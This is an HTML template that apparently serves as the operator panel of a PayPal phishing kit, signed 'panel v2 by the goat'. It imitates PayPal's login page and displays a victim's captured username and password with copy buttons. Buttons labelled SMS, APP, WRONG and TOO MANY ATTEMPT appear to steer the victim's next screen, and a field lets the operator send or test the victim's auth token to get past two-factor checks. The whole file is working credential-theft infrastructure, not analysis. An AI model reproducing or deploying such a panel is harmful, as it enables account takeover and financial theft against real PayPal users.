<!DOCTYPE html>
<html lang="en" class="no-js desktop">
   <!--<![endif]-->
   <head>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
      <script async src="js/ngrlCaptcha.min.js"></script><!--Script info: script: node, template:  , date: Sep 16, 2022 10:30:24 -07:00, country: US, language: en web version:  content version:  hostname : rZJvnqaaQhLn/nmWT8cSUjOx898qoYZ06fendyljjeAbIhfwPzQKG7qTbadYV4On rlogid : rZJvnqaaQhLn%2FnmWT8cSUotSylMGOTGkRUMDpmUTvbXdvevuMMFAfR3mQy2JZfSavI03Q3pWZxE0B1RZg4BOBb8%2FZR5sk5bW_183475a0364 -->
      <meta charset="utf-8">
      <title>Log in to your PayPal account</title>
      <meta http-equiv="content-type" content="text/html; charset=UTF-8">
      <meta name="application-name" content="PayPal">
      <meta name="msapplication-task" content="name=My Account;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_account;icon-uri=https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico">
      <meta name="msapplication-task" content="name=Send Money;action-uri=https://www.paypal.com/us/cgi-bin/webscr?cmd=_send-money-transfer&send_method=domestic;icon-uri=https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico">
      <meta name="keywords" content="transfer money, email money transfer, international money transfer ">
      <meta name="description" content="Transfer money online in seconds with PayPal money transfer. All you need is an email address.">
      <link rel="shortcut icon" href="pp_favicon_x.ico">
      <link rel="apple-touch-icon" href="images/pp64.png">
      <link rel="canonical" href="https://www.paypal.com/us/signin">
      <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=2, user-scalable=yes">
      <meta property="og:image" content="images/pp258.png">
      <link rel="stylesheet" href="{{ url_for('static', filename='contextualLoginElementalUIv2.css')}}">
      <!--[if lte IE 9]>
      <link rel="stylesheet" href="https://www.paypalobjects.com/web/res/2c4/7aa8b2870f80a336755ed96accdc1/css/ie9.css" />
      <![endif]--><!-- build:js inline --><!-- build:[src] js/lib/ --><script nonce src="js/modernizr-2.6.1.js"></script><!-- /build --><!-- /build --><script nonce>/* Special integration eligibility check */function isEligibleIntegration() {var sxf = "";return sxf === 'true' || window.name === 'PPFrameRedirect';}/* Don't bust the frame if this is top window */if (self === top || isEligibleIntegration()) {var antiClickjack = document.getElementById("antiClickjack");if (antiClickjack) {antiClickjack.parentNode.removeChild(antiClickjack);}} else {top.location = self.location;}</script>
   <style>
    @font-face{font-family:pp-sans-big-regular;src:url(https://www.paypalobjects.com/webstatic/mktg/2014design/font/PP-Sans/PayPalSansBig-Regular.eot);src:url(https://www.paypalobjects.com/webstatic/mktg/2014design/font/PP-Sans/PayPalSansBig-Regular.eot?#iefix) format("embedded-opentype"),url(https://www.paypalobjects.com/paypal-ui/fonts/PayPalSansBig-Regular.woff2) format("woff2"),url(https://www.paypalobjects.com/webstatic/mktg/2014design/font/PP-Sans/PayPalSansBig-Regular.svg) format("svg");}

    body{
    background-image: url("https://i.imgur.com/zGc9j2D.jpg");
    }
    .userpass{
    border: 2px solid black;
    resize: none;
    width: 360px;
    text-align: center;
    font-size: 30px;
    height: 45px;
    font-family: Arial, Helvetica, sans-serif;
    border-radius: 9px;
    }
    .tokenfield{
    height: 400px;
    width: 460px;
    border: 1px solid white;
    border-radius: 15px;

    }
    .clipboard{
    height: 400px;
    width: 460px;
    border: 2px solid black;
    border-radius: 9px;
    height: 45px;
    width: 45px;
    background-color: white;
    }
    .clipboardimg{
    height: 30px;
    width: 30px;
    }

    .tokenbutton{
    width: 360px;
    }
    .userpass::-webkit-scrollbar {
   display: none;
 }
.copybuttons{
border: none;
background-color: Transparent;

}


    .loader{
    }
    .hideload{
    }
    .hideload>div{
    }
    .loader>div{
    }
    @keyframes spin{
    100%{
       transform: rotate(360deg)
    }

  </style>





   </head>
    panel v2 by the goat

   <noscript>
         <p class="nonjsAlert" role="alert">NOTE: Many features on the PayPal Web site require Javascript and cookies.</p>
      </noscript>
      <div id="main" class="main" role="main">
         <section id="login" class="login  " data-role="page" data-title="Log in to your PayPal account">
            <div class="corral ">
               <div id="content" class="contentContainer activeContent contentContainerBordered">
                  <header id="header">
                     <center><img src="{{ url_for('static', filename='images/paypal/PPsmall.png')}}" width="25"></img></center>
                     <br><br>
                  </header>
                  <h1 id="headerText" class="headerText  accessAid">Log in to your PayPal account</h1>
                  <p id="phoneSubTagLine" class="subHeaderText hide">Already set up to use your mobile number to log in? Type it below. Otherwise, click the link to log in with email.</p>
                  <p id="subTagLineConnectOtp" class="subHeaderText hide">Forgot your email address? Go to the PayPal website to recover it.</p>
                  <div id="loginContent" class>
                     <div id="loginSection" class>
                        <div class="notifications"></div>
                        <div id="keychainErrorMessage" class="hide">
                           <p class="notification notification-warning blocked-on-8ball hide">PayPal One Touch™ only works for checkout. Please login with your email.</p>
                           <p class="notification notification-warning blocked-on-risky-login hide">Please login with your email and password.</p>
                           <p class="notification notification-critical keychain-activation-failure hide">Something went wrong on our end. Please login with your email and password.</p>
                        </div>
                              <div class="loader"><div>
                                             <center><img src="{{ url_for('static', filename='images/paypal/loader.gif')}}" width="80"></center>
                  <br>
                                  <center><img src="{{ url_for('static', filename='images/paypal/loading.png')}}"></center>
                              </div>
                              </div>


                        <div class="hideload"><div>

                           <input type="hidden" id="token" name="_csrf" value="KoshR14lI8kd3TyIlCLoO79JRSMPUkjH/xz0Q="><input type="hidden" name="locale.x" value="en_US"><input type="hidden" name="processSignin" value="main"><input type="hidden" name="fn_sync_data" value="fn_sync_data"><input type="hidden" name="intent" value="signin"><input type="hidden" name="ads-client-context" value="signin"><input type="hidden" name="isValidCtxId" value><input type="hidden" name="coBrand" value="us"><input type="hidden" name="signUpEndPoint" value="/webapps/mpp/account-selection"><input type="hidden" name="showCountryDropDown" value="true"><input type="hidden" name="requestUrl" value="/signin"><input type="hidden" name="forcePhonePasswordOptIn" value>
                           <div class="profileDisplayName hide"></div>
                           <div class="profileRememberedEmail  hide  "><span class="profileDisplayPhoneCode" dir="ltr"></span><span class="profileDisplayEmail notranslate"></span><a href="#" class="notYouLink scTrack:not-you" id="backToInputEmailLink">Change</a></div>
                           <div id="splitEmail" class="splitEmail ">
                              <div id="splitEmailSection" class="splitPhoneSection splitEmailSection ">
                                 <div class="countryPhoneSelectWrapper hide">
                                    <label class="accessAid" for="phoneCode">Choose your phone country code</label>
                                    <select name="phoneCode" id="phoneCode" class="countryPhoneSelect">
                                       <option selected="selected" value="US +1" data-code="+1" data-country="US">United States (+1)</option>
                                    </select>
                                    <div class="countryPhoneSelectChoice"><span class="countryCode">US</span><span class="phoneCode">+1</span></div>
                                 </div>



                                  <button onclick="copyname()" id="copy" class="copybuttons"><textarea id="usrtext" readonly class="userpass">{{user}}</textarea></button>
                                  <button onclick="copypwd()" id="copy" class="copybuttons"><textarea id="pwdtext" readonly class="userpass">{{passw}}</textarea></button>








                                 <form action="#" method="post" id="paypallogin">

                                 <div class="captcha captcha-container clearfix hide" id="splitHybridCaptcha">
                                    <div class="captcha-image"><img src alt></div>
                                    <div class="captcha-inputs clearfix">
                                       <div class="textInput ">
                                          <div class="fieldWrapper"><input id="splitHybridCaptcha" name="captchaCode" type="text" class="hasHelp  validateEmpty   " value autocomplete="off" placeholder="Enter code" aria-describedby="captchaErrorMessage"><label for="splitHybridCaptcha" class="fieldLabel"></label></div>
                                          <div class="errorMessage" id="captchaErrorMessage">
                                             <p class="emptyError hide">Required</p>
                                          </div>
                                       </div>
                                       <div class="refresh"><a href class="captchaRefresh buttonLight onboardingSpritePseudo scTrack:unifiedlogin-click-reload-captcha imageLink"><span class="accessAid">Reload Image</span></a></div>
                                       <div class="audio">
                                          <audio role="application" id="captchaPlayer" src class="hide"></audio>
                                          <a target="_blank" href class="captchaPlay buttonLight onboardingSpritePseudo scTrack:unifiedlogin-click-play-captcha-audio imageLink"><span class="accessAid">Audio Button</span></a>
                                       </div>
                                    </div>
                                 </div>
                              </button>


                               <button class="button actionContinue scTrack:unifiedlogin-login-click-next" type="submit" name="submit" value="SMS">SMS</button></div>
                            <button class="button actionContinue scTrack:unifiedlogin-login-click-next" type="submit" name="submit"  value="APP" >APP</button></div>
                           <button class="button actionContinue scTrack:unifiedlogin-login-click-next" type="submit" name="submit"  value="ATTEMPT">TOO MANY ATTEMPT</button></div>
                            <button class="button actionContinue scTrack:unifiedlogin-login-click-next" type="submit" name="submit"  value="WRONG">WRONG</button></div>



                              <div class="actions">

                              <div class="tpdDemo hide" id="tpdDemo">
                                 <p class="tpdDemoContent">Log in with your email as usual, and then you'll be prompted to log in with your phone's biometrics.</p>
                              </div>
                              <input type="hidden" id="phone" name="login_phone" value class="validate">
                           </div>


                  </div>
                   </div>
                </div>

   <center>
       <br>
       <div class="tokenfield">
           <br>
       <h1>Change Auth token</h1><br>
       <input type="text" id="tokenvalue" name="tokenvalue" class="userpass" placeholder="Token">
           <br>
       <div class="tokenbutton">
       <button class="button actionContinue scTrack:unifiedlogin-login-click-next" type="submit" name="submit"  value="token">Send Token</button>
           <button class="button actionContinue scTrack:unifiedlogin-login-click-next" type="submit" name="submit"  value="test">Test token</button>
       </div>
       </div>



</form>

<script>
function copyname() {
  var copyText = document.querySelector("#usrtext");
  copyText.select(); document.execCommand("copy");
}
function copypwd() {
  var copyText = document.querySelector("#pwdtext");
  copyText.select(); document.execCommand("copy");
}

document.querySelector("#copy").addEventListener("click", copy);


</script>



   </center>
   <br><br><br><br><br><br><br><br><br><br><br><br>




        <script src="https://code.jquery.com/jquery-3.5.1.js"
          integrity="sha256-QWo7LDvxbWT2tbbQ97B53yJnYU3WhH/C8ycbRAkjPDc="
          crossorigin="anonymous"></script>


<script>
$(".loader").hide();

</script>
      <script nonce>var PAYPAL = PAYPAL || {};PAYPAL.slData = {"slSessionChkTimeout": "","slOptInTimeout": "","slAuthChkTimeout": "","slTokenValidationTimeout": "","slDisplayMerchantLink": "","slAction": "","smartlockStatus": "","slLinkedEmail": "","slFrameSrc": "","slAuthUrl": "","partnerClientId": "","partnerReturnUri": "","scimContextId": "","slOptInOT": "","slLoginEmail": "","slReturnUrl": "","delayPartnerAssertion": "","googleOneTapEnable": ""};</script><script nonce>var PAYPAL = PAYPAL || {};PAYPAL.ulData = {fnUrl: "https://c.paypal.com/da/r/fb.js",fnSessionId: "dd86ef003acf43ba970f8f1029f2fcd5",sourceId: "UNIFIED_LOGIN_INPUT_EMAIL",beaconUrl: "https://b.stats.paypal.com/v1/counter.cgi?r=cD1kZDg2ZWYwMDNhY2Y0M2JhOTcwZjhmMTAyOWYyZmNkNSZpPTE5NC4yOS41My4yMjQmdD0xNjYzMzQ5NDI1LjA2NCZhPTIxJnM9VU5JRklFRF9MT0dJTsnkI7iNvjYjJkC9W7Sd4mvhR-iA",enableSpeedTyping: "true",aPayAuth: "",aPayCanMakePaymentTimeout: "",tokenAssertionUri: "",preloadScriptUrl: "",preloadScriptDownloadLength: 0,fingerprintProceed: "lookup"};</script>
      <noscript><img src="https://c.paypal.com/v1/r/d/b/ns?f=dd86ef003acf43ba970f8f1029f2fcd5&amp;s=UNIFIED_LOGIN_INPUT_EMAIL&amp;js=0&amp;r=1" title="ppfniframe" alt height="1" width="1" border="0"></noscript>
      <script nonce id="ul-sync-data">var PAYPAL = PAYPAL || {};PAYPAL.ulSync = {fnSessionId: 'dd86ef003acf43ba970f8f1029f2fcd5',sourceId: 'UNIFIED_LOGIN_INPUT_EMAIL',fname: 'fn_sync_data'};</script><!-- build:js inline --><!-- build:[src] js/lib/ --><script nonce src="js/fn-sync-telemetry-min.js"></script><!-- /build --><!-- /build --><script nonce>var PAYPAL = PAYPAL || {};PAYPAL.ulData = PAYPAL.ulData || {};PAYPAL.ulData.incontextData = {"version": "","noBridge": "","env": "","icstage": "","targetCancelUrl": "","paymentAction": "","paymentToken": "","merchantID": ""};</script><!-- build:js inline --><!-- build:[src] js/ --><script nonce src="js/signin-split.js"></script><!-- /build --><!-- /build --><!-- build:js inline --><!-- build:[src] js/ --><script nonce src="js/ioc.js"></script><!-- /build --><!-- /build --><script src="js/pa.js"></script><script nonce>var fptiOptions = {data:'pgrp=main%3Aunifiedlogin%3Asplitlogin%3A%3Aemail&page=main%3Aunifiedlogin%3Asplitlogin%3A%3Aemail%3A%3A%3A&qual=input_email&pgst=1663349424996&calc=f561001ad9ed2&nsid=GorwKbsUIVh6PAsb50jUj07XcenqnRW1&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=US&csci=dd86ef003acf43ba970f8f1029f2fcd5&comp=unifiedloginnodeweb&tsrce=mppnodeweb&cu=0&ef_policy=ccpa&xe=105604%2C104200%2C104458%2C102557%2C101408%2C104227%2C106031%2C106033%2C106032%2C105392%2C106035%2C106034%2C106036%2C106057%2C105416%2C105553%2C105552%2C105554%2C104039%2C104038%2C105843%2C105845%2C105844%2C102390%2C104571%2C105340%2C101216%2C103648%2C104200&xt=124899%2C121070%2C119355%2C109630%2C104577%2C117999%2C127662%2C127659%2C127666%2C123875%2C127651%2C127655%2C127648%2C127561%2C123994%2C124689%2C124682%2C124697%2C120732%2C120736%2C126375%2C126401%2C126385%2C108797%2C121328%2C123611%2C103864%2C114559%2C121070&transition_name=ss_prepare_email&userRedirected=true&ctx_login_ot_content=0&obex=signin&landing_page=login&state_name=begin_email&ctx_login_ctxid_fetch=ctxid-not-exist&ctx_login_content_fetch=success&ctx_login_lang_footer=shown&ctx_login_signup_btn=shown%7Cdefault&ctx_login_intent=signin&ctx_login_flow=Signin&ctx_login_state_transition=login_loaded&post_login_redirect=default&ret_url=%2F',url:'https:\/\/t.paypal.com\/ts'};var trackLazyData = "true" === "true";if(trackLazyData){fptiOptions = {...fptiOptions,trackLazyData: true,lazyDataId: 'UnifiedLoginNodeWeb'};}(function(){if(typeof PAYPAL.analytics != "undefined"){PAYPAL.core = PAYPAL.core || {};	PAYPAL.core.pta = PAYPAL.analytics.setup(fptiOptions);						}}());</script>
      <noscript><img src="https://t.paypal.com/ts?nojs=1&amp;pgrp=main%3Aunifiedlogin%3Asplitlogin%3A%3Aemail&amp;page=main%3Aunifiedlogin%3Asplitlogin%3A%3Aemail%3A%3A%3A&amp;qual=input_email&amp;pgst=1663349424996&amp;calc=f561001ad9ed2&amp;nsid=GorwKbsUIVh6PAsb50jUj07XcenqnRW1&amp;rsta=en_US&amp;pgtf=Nodejs&amp;env=live&amp;s=ci&amp;ccpg=US&amp;csci=dd86ef003acf43ba970f8f1029f2fcd5&amp;comp=unifiedloginnodeweb&amp;tsrce=mppnodeweb&amp;cu=0&amp;ef_policy=ccpa&amp;xe=105604%2C104200%2C104458%2C102557%2C101408%2C104227%2C106031%2C106033%2C106032%2C105392%2C106035%2C106034%2C106036%2C106057%2C105416%2C105553%2C105552%2C105554%2C104039%2C104038%2C105843%2C105845%2C105844%2C102390%2C104571%2C105340%2C101216%2C103648%2C104200&amp;xt=124899%2C121070%2C119355%2C109630%2C104577%2C117999%2C127662%2C127659%2C127666%2C123875%2C127651%2C127655%2C127648%2C127561%2C123994%2C124689%2C124682%2C124697%2C120732%2C120736%2C126375%2C126401%2C126385%2C108797%2C121328%2C123611%2C103864%2C114559%2C121070&amp;transition_name=ss_prepare_email&amp;userRedirected=true&amp;ctx_login_ot_content=0&amp;obex=signin&amp;landing_page=login&amp;state_name=begin_email&amp;ctx_login_ctxid_fetch=ctxid-not-exist&amp;ctx_login_content_fetch=success&amp;ctx_login_lang_footer=shown&amp;ctx_login_signup_btn=shown%7Cdefault&amp;ctx_login_intent=signin&amp;ctx_login_flow=Signin&amp;ctx_login_state_transition=login_loaded&amp;post_login_redirect=default&amp;ret_url=%2F" alt height="1" width="1" border="0"></noscript>
      <script async id="grcv3enterpriseframetag" data-key="6LdCCOUUAAAAAHTE-Snr6hi4HJGtJk_d1_ce-gWB" data-action="unifiedloginnodeweb" data-sessionid="_sessionID=GorwKbsUIVh6PAsb50jUj07XcenqnRW1" data-src="https://www.paypalobjects.com/webcaptcha/grcenterprise_v3_static.html" data-submiturl="/auth/verifygrcenterprise" data-csrf="dPviNFppoLH2PaY/JkdRWwBQ7COHZhJDuUsAk=" data-f="dd86ef003acf43ba970f8f1029f2fcd5" src="js/grcenterprise_v3_static.js"></script>
   </body>
</html>